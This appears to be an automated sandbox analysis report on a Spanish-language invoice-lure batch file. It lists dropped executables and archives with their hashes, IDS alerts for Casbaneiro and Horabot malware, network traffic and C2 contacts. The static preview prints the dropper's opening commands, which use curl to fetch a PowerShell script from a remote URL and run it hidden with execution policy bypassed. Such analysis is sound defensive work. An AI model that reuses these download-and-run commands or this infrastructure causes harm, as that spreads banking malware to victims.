                                                                                                      Preview:.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M........+..M...F.f.q..R,..u..>.r.nw.i@.../9...w.6..;..$dr..yO.n....-.....qH..O....?@....L.9"...]g......w_.1N(...+.............. ".....| ".....|kC.R......%x....}...q..U-...(....%....V..?p.h.....l)".N.#.R......v.k@..y..~...I.h...%D'7...Y.....6(..)w....+...........7.`....8.u....h..0p.R%. ).a..^_.B..=H.{.X..........B....". "..PK.| ".....|m........v..5...x...(.U?j....$.1.#.~.\........i...}.k..,..7.)X...0..=...a.o9'../>1...`E..l...M.`.#gp..x.u.. ....6Z....4{Q.k'....{.U5.A....a..)...=..>3.2p.c[.....h..........-.fC.~........E.+.....O..1L..A........=]-..0.@.=....6W.`&o.%.....|.aG..bJ...)..2............yJQ.i%5...(.O!.1.I.Q.....=.bs...3.2..k......H.|N.C:..G..V.EK.H?.......[...".c..@S[.......'ms#...@.A%...::..c..p.e(....X..{...H../.+..b#.0.`r ..[w.X..9.......8..OF..-.:...'.1.s'.%V.&7..8w..o..t.].S..WG........~a8..mYX9..X.Yu/..L4t.H.D....J..~S....j;

                                                                                                      C:\_kjfech8_V\_kjfech8_V.exe (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):947288
                                                                                                      Entropy (8bit):6.629681466265794
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                                      MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                      SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                                      SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                                      SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                      C:\_kjfech8_V\_kjfech8_V.ia (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):68330000
                                                                                                      Entropy (8bit):7.999997201173071
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1572864:EQ27uOe3TzkFTMFcREDv91nY27fqMtQxMCj7920jg9pjUGpDn:hrjoFTMaWTfnjfJYt9C9JDn
                                                                                                      MD5:3AD4359325A5C5D2A33BD7D902A80075
                                                                                                      SHA1:63AA60AC67D9927C25535E967FA9D87549183F89
                                                                                                      SHA-256:1C36B918769F3C9F026D0BE59263DD16CDEDC639CCE24092AEF67A6E36D19CF8
                                                                                                      SHA-512:E33DFB7EE833D75E9DFFB8D02CD5ABBB2403553E50C5756890AE6495F89C43763850DA040F8DF6F95901E233BC5BB3ACB1BBA6655B54A9A7ADED7BBE0D7163D4
                                                                                                      Malicious:false
                                                                                                      Preview:...}/C~.Qz..^.i.a.2.(..'....-..#.$..8..[.Q......xD.P.5..Y....)7Rr..48i....u.sN.-,:...h#.|..D..V.u...$g......%....r...V..H.-....hHpZ.:.........~......x.9AN.Q%..$..E...{#.O...\...)..OE...J.NF....B.[.-@...<.d.4<j..).{.AP..b`.1&..fB.L.K...W..Eeo...>....e.}.r.>..2...........$.@.n..'.!E.. .AY.#...-I.=,..]..x...ifI.3<...T.k..l.0+_d\<.H...v......\.{.....VX......5......-6O....~.wM...i.o..../.r.?...../".<...4...D......{......2z*...ee/7B..m........-....G.](.{.#?It....A...,P...~...".D..3..?..T....[..TI!..~L,f..q..5.../\dtK.}p...J......Rp0...DB.......d.[. .3..F.F64&4....`.fPfp.O.p...4m...)9"O.p.Z.n..h..kx...".k.h.^.2......=..@.E..Wy.s.."ke.bx......(4...'/...%...'......o.vO._...I..(Z.l......).;....(.].........S.q...Ji...........M*._2..s2S..<..'..%#'...}........x.k.*.L.......R..'.}..."..C'{.}.m......\B....E....R.~..-"..*..^.B...........G.cQo.u3.......-L]..U.d..uU....$/4!.....W...oz...S4.W..<....M.c:........-...w.n.....V(j...l.ra.6I..,.g,.."#.

                                                                                                      C:\_kjfech8_V\_kjfech8_V.zip (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                      Category:dropped
                                                                                                      Size (bytes):72830057
                                                                                                      Entropy (8bit):7.999970220702098
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1572864:Rl30xbxfZOMP+N1p1rYU3SXYp9tzd3HToEXq0Jv:rkxbBZOQ6v1rYEVnhbtJv
                                                                                                      MD5:E72F7F139A00045E7A2DAF8A1C0AB730
                                                                                                      SHA1:8F1D21A21EAF6A4E312E2D15CFE4115CD9BE5AFD
                                                                                                      SHA-256:78EBE0FF32A280E98E6720E60FC1E95FBD533C3F4535D41CF790C87125556F8E
                                                                                                      SHA-512:AD31A82D34FE2604099090952ABB33DB7F9370A161227CAF1CC7C28E5083F15D5F8EEF24CF77251BCC846A43DC50D6271B29DAE83297E4147DD5DB41B44B5B65
                                                                                                      Malicious:false
                                                                                                      Preview:PK........oNSY............. .jli.txtUT...R..g. .g.{.fux...............|.E.0.3.I:.!3. .#......TB..y`x.....F.1..d'..]..v.4.Y...^..W.^w.....u'.L.....AX..j.Q..!.H..T.LfB|......LU.:.:Uu....n......9..9+.i...c.vn......{...N.......K.>......!..Uw..|}.z.AL..2.%.&I.......i7.1'.......qK.1\.......q.1..D....{..R.\.q6.M..:4....i.).c'....9.aX.M...).......@:0...+h.........W....=...p.X./.%V6..V....*.w./...U...;..N"..W].WQ..C~g.B.F.|...V......95.u..S.3..1....q7Cz....U0DZG.+..i.(x....9.v.....g..^..Rt....*k..rz....A..exY.\.....m.h....W......h[.......?.f.LQYuu5..../.F,(.i..]Red...b.z4.l(1..k.....].......h..&..tx...BQU.K\X+rM..m......55Pf..._cY..+.ta..Fn7......p.=....U.._.2..]...5..L.h..g...u. ..1N...E..[g.VB.....s.<.$....(..Pn../..7T.R...'b...!.Pm...,........5>...b%...#......I..T.........&Z....\.........../.].......@C.`."n.X._^]Q..%..L....9...M.N..5.....m.........../.....&..u..A....Z....c.vQ...0....`.g.f.*-wU.cw..q.l^VS9.....ov,.n...6:..!..."..k...vNa..q

                                                                                                      C:\_kjfech8_V\_kjfech8_Vi7.exe (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):15936
                                                                                                      Entropy (8bit):6.475860444797363
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:Gpsx5cnV21mSHhV8b+lee84SzFnYPLr7aq:GpscnfS/8KUe8jC7aq
                                                                                                      MD5:4AFCAB972E98ECBF855F915B2739F508
                                                                                                      SHA1:615DC2FA827FAB39E16A7E9721F484E7F4D34F8E
                                                                                                      SHA-256:7CC34A5423BD3FC9FA63D20EBECE4103E22E4360DF5B9CAA2B461069DAC77F4D
                                                                                                      SHA-512:58258F74D7E35C5A83234A98BC033846BE5A65146BD992E738A8678706A18C30759BD405FBB30A296181E2F92ACB0219DF8979030CC45D1CDEC6AC06E8BC00D5
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L......V............................|........ ....@..........................`......Z.....@.................................4#..P....@..H............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...H....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\_kjfech8_V\b.txt

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):24278
                                                                                                      Entropy (8bit):7.992239472488486
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:384:MZ/cBozUqKi8DsHqjFnKNSTYY0Rez/5QLkWN6vXiAq+7UYaiaeOaIfxVh+bJ/jIW:6/vUqKFsKw0h1QL7Qvy8UYP6aIfxVgbz
                                                                                                      MD5:36B4C39FF2982F0A7D3DEDC71839AFA7
                                                                                                      SHA1:ABE9615811A42C68368C6472E520CC0AFDB74E02
                                                                                                      SHA-256:F189601651275217ACFC20A19E1D27D2AD2F9687BFD05E2D7C760EC749E93F17
                                                                                                      SHA-512:CDDD0EB6EA3F639C5853BAB86F852D1F9AC2B91053380D1F732693E12A96ED1F662833DD48993A13F11DF9809552E7F1097090CE1ADF633E8E1A3D668418C506
                                                                                                      Malicious:false
                                                                                                      Preview:.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M....,p~.=.....C.9..8..._yr.0x.y...&I..O.L4s.m.1..((..b...^......=...6..q.J.%>f..?3}.I..F..t..^..V...:.P8"..:................ "..0.Lw "..0.LwkC.R......%x....}...q..U-...(....%....V..?p.h.........?.o..T..[..f.w..$ D...$.6..*D.w....x.U..&..m.....n...U.S*...'....Y.E...,../......:^;.5.g5.....z......UH..\ .......B...... "..m.Iw "....Kwm........v..5...x...(.U?j....$.1.#.~.\........i...}.k..,..7.)X...0..=...a.o9'../>1...`E..l...M.`.#gp..x.u.. ....6Z....4{Q.k'....{.U5.A....a..)...=..>3.2p.c[.....h..........-.fC.~........E.+.....O..1L..A........=]-..0.@.=....6W.`&o.%.....|.aG..bJ...)..2............yJQ.i%5...(.O!.1.I.Q.....=.bs...3.2..k......H.|N.C:..G..V.EK.H?.......[...".c..@S[.......'ms#...@.A%...::..c..p.e(....X..{...H../.+..b#.0.`r ..[w.X..9.......8..OF..-.:...'.1.s'.%V.&7..8w..o..t.].S..WG........~a8..mYX9..X.Yu/..L4t.H.D....J..~S....j;....

                                                                                                      C:\_kjfech8_V\c.txt

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):24286
                                                                                                      Entropy (8bit):7.992282333476335
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:384:MT8/cBozUqKi8DsHqjFnKNSTYY0Rez/5QLkWN6vXiAq+7UYaiaeOaIfxVh+bJ/jW:e8/vUqKFsKw0h1QL7Qvy8UYP6aIfxVgs
                                                                                                      MD5:2F200A8033EB6129E54D5FA818A64A21
                                                                                                      SHA1:68B6D29FF5CA9B4044B130AF7FF4F8FFC7703044
                                                                                                      SHA-256:F7BAA214EC4B2B4B05ABA4AD2CB96B04EB090E8DF9D53FC395B4636661928A25
                                                                                                      SHA-512:9A1A4B444EDAE236EDCF26C2544D9A83F544D0D8F53CFD21A12132D80F0D6D18ACE5B76D907B5FD672412C5B954DF4A738A748D600EDCC0D13B2307AE3FCDA1F
                                                                                                      Malicious:false
                                                                                                      Preview:.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M........+..M...F.f.q..R,..u..>.r.nw.i@.../9...w.6..;..$dr..yO.n....-.....qH..O....?@....L.9"...]g......w_.1N(...+.............. ".....| ".....|kC.R......%x....}...q..U-...(....%....V..?p.h.....l)".N.#.R......v.k@..y..~...I.h...%D'7...Y.....6(..)w....+...........7.`....8.u....h..0p.R%. ).a..^_.B..=H.{.X..........B....". "..PK.| ".....|m........v..5...x...(.U?j....$.1.#.~.\........i...}.k..,..7.)X...0..=...a.o9'../>1...`E..l...M.`.#gp..x.u.. ....6Z....4{Q.k'....{.U5.A....a..)...=..>3.2p.c[.....h..........-.fC.~........E.+.....O..1L..A........=]-..0.@.=....6W.`&o.%.....|.aG..bJ...)..2............yJQ.i%5...(.O!.1.I.Q.....=.bs...3.2..k......H.|N.C:..G..V.EK.H?.......[...".c..@S[.......'ms#...@.A%...::..c..p.e(....X..{...H../.+..b#.0.`r ..[w.X..9.......8..OF..-.:...'.1.s'.%V.&7..8w..o..t.].S..WG........~a8..mYX9..X.Yu/..L4t.H.D....J..~S....j;

                                                                                                      C:\_kjfech8_V\exe.txt

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):947288
                                                                                                      Entropy (8bit):6.629681466265794
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                                      MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                      SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                                      SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                                      SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                      C:\_kjfech8_V\i7.txt

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):15936
                                                                                                      Entropy (8bit):6.475860444797363
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:Gpsx5cnV21mSHhV8b+lee84SzFnYPLr7aq:GpscnfS/8KUe8jC7aq
                                                                                                      MD5:4AFCAB972E98ECBF855F915B2739F508
                                                                                                      SHA1:615DC2FA827FAB39E16A7E9721F484E7F4D34F8E
                                                                                                      SHA-256:7CC34A5423BD3FC9FA63D20EBECE4103E22E4360DF5B9CAA2B461069DAC77F4D
                                                                                                      SHA-512:58258F74D7E35C5A83234A98BC033846BE5A65146BD992E738A8678706A18C30759BD405FBB30A296181E2F92ACB0219DF8979030CC45D1CDEC6AC06E8BC00D5
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L......V............................|........ ....@..........................`......Z.....@.................................4#..P....@..H............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...H....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\_kjfech8_V\jli.dll

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):11786677
                                                                                                      Entropy (8bit):5.694433926204656
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:98304:yyDhUpv82rzae7Cxd/qmglqhzzewpDbj85nCQRalZLCwpokCFCxJD9LKXo:PyPp7CxwqhvD0JTo
                                                                                                      MD5:C330C02F31F3ADDF099F3EF457F177C3
                                                                                                      SHA1:7410D5A5BFC9FC480CEF4B572AE8A7DA482FC211
                                                                                                      SHA-256:9352FF1DCF47CCAC6895E0C1974B38DABC58DFE9CB356A6168CCD06B5112DD08
                                                                                                      SHA-512:0946B20B5978139FF6E8FEBA29ABAB4251D890E43F46AA7C1FA07AD67371EAF23A616F109A838FD14CA57EB7BB4DD72C186D9C0DBB44627497E6123B7C37AD6A
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 19%
                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...$..g...........!................0.............@.......................................@.......................... ...........0....!..N...................@.......@$.............................................p...........`....................text...d........................... ..`.itext..H........................... ..`.data....S.......T..................@....bss....Dl...`...........................idata...0.......2...6..............@....didata.`............h..............@....edata....... .......v..............@..@.rdata..E....0.......x..............@..@.reloc.......@.......z..............@..B.rsrc....N....!..N... !.............@..@.debug...k...@$..k...n#.............@..@........................................................

                                                                                                      C:\_kjfech8_V\jli.txt

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):11786680
                                                                                                      Entropy (8bit):5.694435074250896
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:98304:EyDhUpv82rzae7Cxd/qmglqhzzewpDbj85nCQRalZLCwpokCFCxJD9LKXo:NyPp7CxwqhvD0JTo
                                                                                                      MD5:3A4452621480142924BB26CC54B37FCF
                                                                                                      SHA1:137BB88AEC95275F5B618FE3334629EE70920366
                                                                                                      SHA-256:F302E18DEEAAB3F22D035E2D1EB94DD980B2E9DEB81544543FB944CF3D1DAA0A
                                                                                                      SHA-512:6FF8F2B891ABFA0F2D036BFFC9CA5069A1DB6D98C3E3C42C29F4F5F2761E076EEA4F231D2B45040EBA6F517AB5B6718EA4F4971D942ABF57D900F0096E7CD3BC
                                                                                                      Malicious:false
                                                                                                      Preview:{},MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...$..g...........!................0.............@.......................................@.......................... ...........0....!..N...................@.......@$.............................................p...........`....................text...d........................... ..`.itext..H........................... ..`.data....S.......T..................@....bss....Dl...`...........................idata...0.......2...6..............@....didata.`............h..............@....edata....... .......v..............@..@.rdata..E....0.......x..............@..@.reloc.......@.......z..............@..B.rsrc....N....!..N... !.............@..@.debug...k...@$..k...n#.............@..@.....................................................

                                                                                                      \Device\ConDrv

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\curl.exe
                                                                                                      File Type:ASCII text, with CR, LF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):399
                                                                                                      Entropy (8bit):3.2243769951518737
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgcdSgOgc9eFJNVZNFGI5h:Vz6ykymUexb1U9cL9c9eFJNfNpT
                                                                                                      MD5:323EE4F8E6719CD748191A22C90D2571
                                                                                                      SHA1:2BEC20C3A3212599D6BC0B8E8605EF04397FF0EE
                                                                                                      SHA-256:A7D27E734B1D314C9E18043D7CA0EE809A8B090A5825ED4DAA9F4571F6B9F83F
                                                                                                      SHA-512:9E797E180CF71FE48B5BC189DB0FDA0E34AC4BA7753F83D8B65B75170EDC76C92B36B9EACBB0383FDC80C491B0C40C8D51AE7F129CA3C277EE78B60D43719994
                                                                                                      Malicious:false
                                                                                                      Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0.100 26455 100 26455 0 0 26455 0 0:00:01 0:00:01 --:--:-- 26038..

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                      Entropy (8bit):5.36691612016954
                                                                                                      TrID:
                                                                                                        File name:Factura-2410-CFDI.bat
                                                                                                        File size:1'015 bytes
                                                                                                        MD5:2cba1f2ecba7411565c62f74f8ff095c
                                                                                                        SHA1:e69a4fccd578e235fa31c3edc9d8b4a6974faeb0
                                                                                                        SHA256:1a17e8bd86fbe8d1fb1aedce6182de434a3a8e71488f6d285651c168d03242eb
                                                                                                        SHA512:3bd419ada4704e59b543d495d1718dbc4a146562a47667c60adea11c0c14d4ff1c88f38f12ba112106532ed59eea23a69dfc0d63b9d2154e77d3917cc1bc84d6
                                                                                                        SSDEEP:24:QXKLdVVFbZd8d3UQ3WFYHW9ch6WFYHWI2:zLXIdkAWi29ch6Wi2I2
                                                                                                        TLSH:7A11213291CA933EFD020C2FD0B5D846DB5FC847B34992C1B13A1F18718A698829F1C6
                                                                                                        File Content Preview:@echo off..curl "https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0803-44a8-b1e0-254f44c155e2" -o "C:\Users\Public\Documents\vs1.ps1" ..powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\User

                                                                                                        File Icon

                                                                                                        Icon Hash:9686878b929a9886

                                                                                                        Network Behavior

                                                                                                        Suricata IDS Alerts

                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                        2024-10-27T00:21:47.576164+02002841717ETPRO MALWARE PowerShell/TrojanDownloader Casbaneiro CnC1192.168.11.204975062.72.3.21080TCP
                                                                                                        2024-10-27T00:21:58.065441+02002052642ET MALWARE Horabot Payload Inbound193.127.200.211443192.168.11.2049752TCP
                                                                                                        2024-10-27T00:21:58.065441+02002834717ETPRO MALWARE PowerShell Inbound with Antivirus Enumeration and Downloading Capabilities193.127.200.211443192.168.11.2049752TCP

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Oct 27, 2024 00:21:25.243632078 CEST4974980192.168.11.2086.38.217.167
                                                                                                        Oct 27, 2024 00:21:26.256391048 CEST4974980192.168.11.2086.38.217.167
                                                                                                        Oct 27, 2024 00:21:28.271619081 CEST4974980192.168.11.2086.38.217.167
                                                                                                        Oct 27, 2024 00:21:32.286343098 CEST4974980192.168.11.2086.38.217.167
                                                                                                        Oct 27, 2024 00:21:40.300307989 CEST4974980192.168.11.2086.38.217.167
                                                                                                        Oct 27, 2024 00:21:46.744873047 CEST4975080192.168.11.2062.72.3.210
                                                                                                        Oct 27, 2024 00:21:46.895945072 CEST804975062.72.3.210192.168.11.20
                                                                                                        Oct 27, 2024 00:21:46.896239996 CEST4975080192.168.11.2062.72.3.210
                                                                                                        Oct 27, 2024 00:21:46.896555901 CEST4975080192.168.11.2062.72.3.210
                                                                                                        Oct 27, 2024 00:21:47.047450066 CEST804975062.72.3.210192.168.11.20
                                                                                                        Oct 27, 2024 00:21:47.047605991 CEST804975062.72.3.210192.168.11.20
                                                                                                        Oct 27, 2024 00:21:47.051057100 CEST4975080192.168.11.2062.72.3.210
                                                                                                        Oct 27, 2024 00:21:47.244749069 CEST804975062.72.3.210192.168.11.20
                                                                                                        Oct 27, 2024 00:21:47.576164007 CEST4975080192.168.11.2062.72.3.210
                                                                                                        Oct 27, 2024 00:21:47.768862009 CEST804975062.72.3.210192.168.11.20
                                                                                                        Oct 27, 2024 00:21:47.884037018 CEST804975062.72.3.210192.168.11.20
                                                                                                        Oct 27, 2024 00:21:47.884052038 CEST804975062.72.3.210192.168.11.20
                                                                                                        Oct 27, 2024 00:21:47.884290934 CEST4975080192.168.11.2062.72.3.210
                                                                                                        Oct 27, 2024 00:21:47.884290934 CEST4975080192.168.11.2062.72.3.210
                                                                                                        Oct 27, 2024 00:21:57.308852911 CEST49752443192.168.11.2093.127.200.211
                                                                                                        Oct 27, 2024 00:21:57.308876038 CEST4434975293.127.200.211192.168.11.20
                                                                                                        Oct 27, 2024 00:21:57.309402943 CEST49752443192.168.11.2093.127.200.211
                                                                                                        Oct 27, 2024 00:21:57.311095953 CEST49752443192.168.11.2093.127.200.211
                                                                                                        Oct 27, 2024 00:21:57.311146975 CEST4434975293.127.200.211192.168.11.20
                                                                                                        Oct 27, 2024 00:21:57.618760109 CEST4434975293.127.200.211192.168.11.20
                                                                                                        Oct 27, 2024 00:21:57.619021893 CEST49752443192.168.11.2093.127.200.211
                                                                                                        Oct 27, 2024 00:21:57.620224953 CEST49752443192.168.11.2093.127.200.211
                                                                                                        Oct 27, 2024 00:21:57.620237112 CEST4434975293.127.200.211192.168.11.20
                                                                                                        Oct 27, 2024 00:21:57.620481014 CEST4434975293.127.200.211192.168.11.20
                                                                                                        Oct 27, 2024 00:21:57.623102903 CEST49752443192.168.11.2093.127.200.211
                                                                                                        Oct 27, 2024 00:21:57.663963079 CEST4434975293.127.200.211192.168.11.20
                                                                                                        Oct 27, 2024 00:21:57.914684057 CEST4434975293.127.200.211192.168.11.20
                                                                                                        Oct 27, 2024 00:21:57.914700985 CEST4434975293.127.200.211192.168.11.20
                                                                                                        Oct 27, 2024 00:21:57.915168047 CEST49752443192.168.11.2093.127.200.211
                                                                                                        Oct 27, 2024 00:21:57.915182114 CEST4434975293.127.200.211192.168.11.20
                                                                                                        Oct 27, 2024 00:21:57.968902111 CEST49752443192.168.11.2093.127.200.211
                                                                                                        Oct 27, 2024 00:21:58.064656019 CEST4434975293.127.200.211192.168.11.20
                                                                                                        Oct 27, 2024 00:21:58.064661980 CEST4434975293.127.200.211192.168.11.20
                                                                                                        Oct 27, 2024 00:21:58.064831972 CEST49752443192.168.11.2093.127.200.211
                                                                                                        Oct 27, 2024 00:21:58.064940929 CEST49752443192.168.11.2093.127.200.211
                                                                                                        Oct 27, 2024 00:21:58.065130949 CEST4434975293.127.200.211192.168.11.20
                                                                                                        Oct 27, 2024 00:21:58.065135956 CEST4434975293.127.200.211192.168.11.20
                                                                                                        Oct 27, 2024 00:21:58.065392017 CEST4434975293.127.200.211192.168.11.20
                                                                                                        Oct 27, 2024 00:21:58.065403938 CEST4434975293.127.200.211192.168.11.20
                                                                                                        Oct 27, 2024 00:21:58.065622091 CEST49752443192.168.11.2093.127.200.211
                                                                                                        Oct 27, 2024 00:21:58.065924883 CEST49752443192.168.11.2093.127.200.211
                                                                                                        Oct 27, 2024 00:21:58.298491001 CEST4975380192.168.11.2086.38.217.167
                                                                                                        Oct 27, 2024 00:21:59.324943066 CEST4975380192.168.11.2086.38.217.167
                                                                                                        Oct 27, 2024 00:22:01.327224016 CEST4975380192.168.11.2086.38.217.167
                                                                                                        Oct 27, 2024 00:22:05.342127085 CEST4975380192.168.11.2086.38.217.167
                                                                                                        Oct 27, 2024 00:22:13.355809927 CEST4975380192.168.11.2086.38.217.167

                                                                                                        UDP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Oct 27, 2024 00:21:56.938231945 CEST5291753192.168.11.201.1.1.1
                                                                                                        Oct 27, 2024 00:21:57.304321051 CEST53529171.1.1.1192.168.11.20

                                                                                                        DNS Queries

                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Oct 27, 2024 00:21:56.938231945 CEST192.168.11.201.1.1.10x687dStandard query (0)fsnat.shopA (IP address)IN (0x0001)false

                                                                                                        DNS Answers

                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Oct 27, 2024 00:21:57.304321051 CEST1.1.1.1192.168.11.200x687dNo error (0)fsnat.shop93.127.200.211A (IP address)IN (0x0001)false

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • fsnat.shop
                                                                                                        • 62.72.3.210

                                                                                                        HTTP Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.11.204975062.72.3.210806872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 27, 2024 00:21:46.896555901 CEST167OUTPOST /ldht/index.php HTTP/1.1
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Host: 62.72.3.210
                                                                                                        Content-Length: 94
                                                                                                        Expect: 100-continue
                                                                                                        Connection: Keep-Alive
                                                                                                        Oct 27, 2024 00:21:47.047605991 CEST25INHTTP/1.1 100 Continue
